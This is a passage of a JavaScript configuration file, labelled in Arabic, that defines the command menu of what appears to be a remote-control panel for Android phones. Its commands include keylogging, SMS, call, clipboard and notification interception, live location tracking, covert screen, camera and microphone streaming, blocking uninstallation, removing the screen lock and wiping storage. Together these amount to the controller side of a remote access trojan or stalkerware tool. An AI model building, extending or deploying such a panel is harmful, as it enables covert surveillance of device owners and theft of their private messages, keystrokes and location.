        paramFields: [
          { key: 'old_pin', label: 'الرمز الحالي', type: 'text', placeholder: 'الرمز القديم', required: true },
          { key: 'new_pin', label: 'الرمز الجديد', type: 'text', placeholder: 'الرمز الجديد', required: true },
        ],
      },
      enable_biometric: { cmd: 'enable_biometric', name: 'تشغيل البصمة', icon: '☝️', category: 'security' },
      disable_biometric: { cmd: 'disable_biometric', name: 'إيقاف البصمة', icon: '🚫', category: 'security' },
      anti_uninstall_on: { cmd: 'anti_uninstall_on', name: 'حماية الحذف', icon: '🛡️', category: 'security' },
      anti_uninstall_off: { cmd: 'anti_uninstall_off', name: 'إلغاء الحماية', icon: '❌', category: 'security' },
      device_admin_status: { cmd: 'device_admin_status', name: 'حالة المسؤول', icon: '👑', category: 'security' },
      check_root: { cmd: 'get_info', name: 'فحص الروت', icon: '🔍', category: 'security', params: { check_root: true } },
      enable_lost_mode: { cmd: 'enable_lost_mode', name: 'وضع الفقدان', icon: '🆘', category: 'security' },
      disable_lost_mode: { cmd: 'disable_lost_mode', name: 'إيقاف وضع الفقدان', icon: '✅', category: 'security' },
      wipe_external: { cmd: 'wipe_external', name: 'مسح التخزين الخارجي', icon: '🧹', category: 'security' },
      lock_with_message: {
        cmd: 'lock_with_message', name: 'قفل برسالة', icon: '💬', category: 'security',
        hasParams: true,
        paramFields: [{ key: 'message', label: 'الرسالة', type: 'text', placeholder: 'هاتف مفقود - يرجى الاتصال', required: true }],
      },
      set_owner_info: {
        cmd: 'set_owner_info', name: 'معلومات المالك', icon: '👤', category: 'security',
        hasParams: true,
        paramFields: [{ key: 'info', label: 'معلومات المالك', type: 'text', placeholder: 'الاسم والرقم', required: true }],
      },
      enable_encryption: { cmd: 'enable_encryption', name: 'تشفير الجهاز', icon: '🔐', category: 'security' },
      get_security_patch: { cmd: 'get_security_patch', name: 'تحديث الأمان', icon: '🛡️', category: 'security' },
      get_safety_net: { cmd: 'get_safety_net', name: 'SafetyNet', icon: '✅', category: 'security' },
      verify_boot: { cmd: 'verify_boot', name: 'التحقق من الإقلاع', icon: '🔍', category: 'security' },
      set_password_policy: {
        cmd: 'set_password_policy', name: 'سياسة كلمة المرور', icon: '🔑', category: 'security',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: true,
          options: [
            { label: 'بدون', value: 'none' },
            { label: 'منخفض', value: 'low' },
            { label: 'متوسط', value: 'medium' },
            { label: 'عالي', value: 'high' },
          ],
        }],
      },
      force_lock_now: { cmd: 'force_lock_now', name: 'قفل فوري', icon: '🔒', category: 'security' },
      get_lock_history: { cmd: 'get_lock_history', name: 'سجل القفل', icon: '📜', category: 'security' },
      set_screen_lock: { cmd: 'set_screen_lock', name: 'تفعيل قفل الشاشة', icon: '🔐', category: 'security' },
      remove_screen_lock: { cmd: 'remove_screen_lock', name: 'إزالة قفل الشاشة', icon: '🔓', category: 'security' },
      lock_screen_now: { cmd: 'lock_screen_now', name: 'قفل الآن', icon: '🔒', category: 'security' },
      lock_with_password: {
        cmd: 'lock_with_password', name: 'قفل بكلمة مرور', icon: '🔑', category: 'security',
        hasParams: true,
        paramFields: [{ key: 'password', label: 'كلمة المرور', type: 'text', placeholder: '••••', required: true }],
      },
      set_pin: {
        cmd: 'set_pin', name: 'تعيين PIN', icon: '🔢', category: 'security',
        hasParams: true,
        paramFields: [{ key: 'pin', label: 'رمز PIN', type: 'text', placeholder: '••••', required: true }],
      },
      remove_pin: { cmd: 'remove_pin', name: 'إزالة PIN', icon: '🚫', category: 'security' },
      set_password_quality: {
        cmd: 'set_password_quality', name: 'جودة كلمة المرور', icon: '🏆', category: 'security',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: true,
          options: [
            { label: 'بدون', value: 'none' },
            { label: 'منخفض', value: 'low' },
            { label: 'متوسط', value: 'medium' },
            { label: 'عالي', value: 'high' },
          ],
        }],
      },
      request_device_admin: { cmd: 'request_device_admin', name: 'طلب صلاحية المسؤول', icon: '👑', category: 'security' },
      get_encryption_status: { cmd: 'get_encryption_status', name: 'حالة التشفير', icon: '🔐', category: 'security' },
      disable_camera_hw: { cmd: 'disable_camera_hw', name: 'تعطيل الكاميرا', icon: '📵', category: 'security' },
      enable_camera_hw: { cmd: 'enable_camera_hw', name: 'تفعيل الكاميرا', icon: '📷', category: 'security' },
      disable_screen_capture: { cmd: 'disable_screen_capture', name: 'منع التقاط الشاشة', icon: '🚫', category: 'security' },
      enable_screen_capture: { cmd: 'enable_screen_capture', name: 'السماح بالتقاط الشاشة', icon: '✅', category: 'security' },
    },
  },
  monitor: {
    name: 'المراقبة',
    icon: '🔍',
    color: '#00BCD4',
    commands: {
      keylogger_start: { cmd: 'keylogger_start', name: 'بدء تسجيل المفاتيح', icon: '⌨️', category: 'monitor' },
      keylogger_stop: { cmd: 'keylogger_stop', name: 'إيقاف تسجيل المفاتيح', icon: '⏹️', category: 'monitor' },
      get_keylogger: { cmd: 'get_keylogger', name: 'عرض السجل', icon: '📋', category: 'monitor' },
      screen_record_start: { cmd: 'screen_record_start', name: 'بدء تسجيل الشاشة', icon: '🎬', category: 'monitor' },
      screen_record_stop: { cmd: 'stop_screen', name: 'إيقاف التسجيل', icon: '⏹️', category: 'monitor' },
      location_live: { cmd: 'location_live', name: 'تتبع مباشر', icon: '📍', category: 'monitor' },
      location_stop: { cmd: 'location_stop', name: 'إيقاف التتبع', icon: '⛔', category: 'monitor' },
      clipboard_monitor_start: { cmd: 'clipboard_monitor_start', name: 'مراقبة الحافظة', icon: '📋', category: 'monitor' },
      clipboard_monitor_stop: { cmd: 'clipboard_monitor_stop', name: 'إيقاف مراقبة الحافظة', icon: '⏹️', category: 'monitor' },
      sms_monitor: { cmd: 'sms_monitor', name: 'مراقبة الرسائل', icon: '💬', category: 'monitor' },
      call_monitor: { cmd: 'call_monitor', name: 'مراقبة المكالمات', icon: '📞', category: 'monitor' },
      sms_monitor_stop: { cmd: 'sms_monitor_stop', name: 'إيقاف مراقبة الرسائل', icon: '⏹️', category: 'monitor' },
      call_monitor_stop: { cmd: 'call_monitor_stop', name: 'إيقاف مراقبة المكالمات', icon: '⏹️', category: 'monitor' },
      wifi_monitor_start: { cmd: 'wifi_monitor_start', name: 'مراقبة WiFi', icon: '📶', category: 'monitor' },
      wifi_monitor_stop: { cmd: 'wifi_monitor_stop', name: 'إيقاف مراقبة WiFi', icon: '⏹️', category: 'monitor' },
      app_monitor_start: { cmd: 'app_monitor_start', name: 'مراقبة التطبيقات', icon: '📲', category: 'monitor' },
      app_monitor_stop: { cmd: 'app_monitor_stop', name: 'إيقاف مراقبة التطبيقات', icon: '⏹️', category: 'monitor' },
      get_app_log: { cmd: 'get_app_log', name: 'سجل التطبيقات', icon: '📋', category: 'monitor' },
      notification_monitor_start: { cmd: 'notification_monitor_start', name: 'مراقبة الإشعارات', icon: '🔔', category: 'monitor' },
      notification_monitor_stop: { cmd: 'notification_monitor_stop', name: 'إيقاف الإشعارات', icon: '⏹️', category: 'monitor' },
      get_notification_history: { cmd: 'get_notification_history', name: 'سجل الإشعارات', icon: '📜', category: 'monitor' },
      get_clipboard_history: { cmd: 'get_clipboard_history', name: 'سجل الحافظة', icon: '📋', category: 'monitor' },
      get_location_history: { cmd: 'get_location_history', name: 'سجل المواقع', icon: '🗺️', category: 'monitor' },
      clear_location_history: { cmd: 'clear_location_history', name: 'مسح سجل المواقع', icon: '🧹', category: 'monitor' },
      clear_clipboard_history: { cmd: 'clear_clipboard_history', name: 'مسح سجل الحافظة', icon: '🧹', category: 'monitor' },
      clear_keylog: { cmd: 'clear_keylog', name: 'مسح سجل المفاتيح', icon: '🧹', category: 'monitor' },
      geo_add: {
        cmd: 'geo_add', name: 'إضافة سياج جغرافي', icon: '🚧', category: 'monitor',
        hasParams: true,
        paramFields: [
          { key: 'lat', label: 'خط العرض', type: 'number', placeholder: '24.7136', required: true },
          { key: 'lng', label: 'خط الطول', type: 'number', placeholder: '46.6753', required: true },
          { key: 'radius', label: 'نصف القطر (م)', type: 'number', placeholder: '100', required: true },
        ],
      },
      geo_remove: {
        cmd: 'geo_remove', name: 'حذف سياج جغرافي', icon: '❌', category: 'monitor',
        hasParams: true,
        paramFields: [{ key: 'id', label: 'المعرف', type: 'text', placeholder: 'fence-id', required: true }],
      },
      geo_list: { cmd: 'geo_list', name: 'قائمة السياجات', icon: '📋', category: 'monitor' },
      screenshot_burst: {
        cmd: 'screenshot_burst', name: 'لقاطات متعددة', icon: '📸', category: 'monitor',
        hasParams: true,
        paramFields: [{ key: 'count', label: 'العدد', type: 'number', placeholder: '5', required: false }],
      },
      record_screen_video: {
        cmd: 'record_screen_video', name: 'فيديو الشاشة', icon: '🎥', category: 'monitor',
        hasParams: true,
        paramFields: [{ key: 'seconds', label: 'المدة (ثانية)', type: 'number', placeholder: '30', required: false }],
      },
      get_device_events: { cmd: 'get_device_events', name: 'أحداث الجهاز', icon: '📜', category: 'monitor' },
      events_on: { cmd: 'events_on', name: 'تفعيل الإرسال', icon: '✅', category: 'monitor' },
      events_off: { cmd: 'events_off', name: 'إيقاف الإرسال', icon: '❌', category: 'monitor' },
      events_status: { cmd: 'events_status', name: 'حالة الأحداث', icon: 'ℹ️', category: 'monitor' },
      events_clear: { cmd: 'events_clear', name: 'مسح الأحداث', icon: '🧹', category: 'monitor' },
    },
  },
  streaming: {
    name: 'البث المباشر',
    icon: '📡',
    color: '#E91E63',
    commands: {
      start_screen_stream: {
        cmd: 'start_screen_stream', name: 'بث الشاشة', icon: '🖥️', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '480p', value: '480p' },
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
          ],
        }],
      },
      stop_screen_stream: { cmd: 'stop_screen_stream', name: 'إيقاف بث الشاشة', icon: '⏹️', category: 'streaming' },
      start_camera_stream: { cmd: 'start_camera_stream', name: 'بث الكاميرا', icon: '📷', category: 'streaming' },
      stop_camera_stream: { cmd: 'stop_camera_stream', name: 'إيقاف بث الكاميرا', icon: '⏹️', category: 'streaming' },
      start_audio_stream: { cmd: 'start_audio_stream', name: 'بث الصوت', icon: '🎙️', category: 'streaming' },
      stop_audio_stream: { cmd: 'stop_audio_stream', name: 'إيقاف بث الصوت', icon: '⏹️', category: 'streaming' },
      switch_camera: { cmd: 'switch_camera', name: 'تبديل الكاميرا', icon: '🔄', category: 'streaming' },
      set_stream_quality: {
        cmd: 'set_stream_quality', name: 'جودة البث', icon: '⚙️', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: true,
          options: [
            { label: '480p', value: '480p' },
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
            { label: '1440p', value: '1440p' },
          ],
        }],
      },
      stop_all_streams: { cmd: 'stop_all_streams', name: 'إيقاف كل البث', icon: '⛔', category: 'streaming' },
      start_screen_stream_hd: {
        cmd: 'start_screen_stream_hd', name: 'بث HD', icon: '🖥️', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
          ],
        }],
      },
      start_screen_stream_sd: {
        cmd: 'start_screen_stream_sd', name: 'بث SD', icon: '📺', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '240p', value: '240p' },
            { label: '480p', value: '480p' },
          ],
        }],
      },
      start_front_camera_hd: {
        cmd: 'start_front_camera_hd', name: 'بث أمامية HD', icon: '🤳', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
          ],
        }],
      },
      start_back_camera_hd: {
        cmd: 'start_back_camera_hd', name: 'بث خلفية HD', icon: '📷', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
          ],
        }],
      },
      start_screen_audio_stream: {
        cmd: 'start_screen_audio_stream', name: 'بث شاشة+صوت', icon: '🎥', category: 'streaming',
        hasParams: true,
        paramFields: [{
          key: 'quality', label: 'الجودة', type: 'select', required: false,
          options: [
            { label: '480p', value: '480p' },
            { label: '720p', value: '720p' },
            { label: '1080p', value: '1080p' },
          ],
        }],
      },
      get_stream_stats: { cmd: 'get_stream_status', name: 'إحصائيات البث', icon: '📊', category: 'streaming' },
      list_active_streams: { cmd: 'get_stream_status', name: 'البث النشط', icon: '📡', category: 'streaming' },
      enable_torch_stream: {
        cmd: 'enable_torch', name: 'كشاف البث', icon: '🔦', category: 'streaming',
        hasParams: true,
        paramFields: [{ key: 'enabled', label: 'تفعيل', type: 'select', required: true,
          options: [{ label: 'تشغيل', value: 'true' }, { label: 'إيقاف', value: 'false' }] }],
      },
      pause_stream: {
        cmd: 'pause_stream', name: 'إيقاف مؤقت', icon: '⏸️', category: 'streaming',
        hasParams: true,
        paramFields: [{ key: 'stream', label: 'البث', type: 'select', required: false,
          options: [
            { label: 'الشاشة', value: 'screen' },
            { label: 'الكاميرا', value: 'camera' },
            { label: 'الصوت', value: 'audio' },
          ]}],
      },
      resume_stream: {
        cmd: 'resume_stream', name: 'استئناف البث', icon: '▶️', category: 'streaming',
        hasParams: true,
        paramFields: [{ key: 'stream', label: 'البث', type: 'select', required: false,
          options: [
            { label: 'الشاشة', value: 'screen' },
            { label: 'الكاميرا', value: 'camera' },
            { label: 'الصوت', value: 'audio' },
          ]}],
      },
      get_stream_capabilities: { cmd: 'get_stream_capabilities', name: 'قدرات البث', icon: '🔧', category: 'streaming' },
    },
  },
}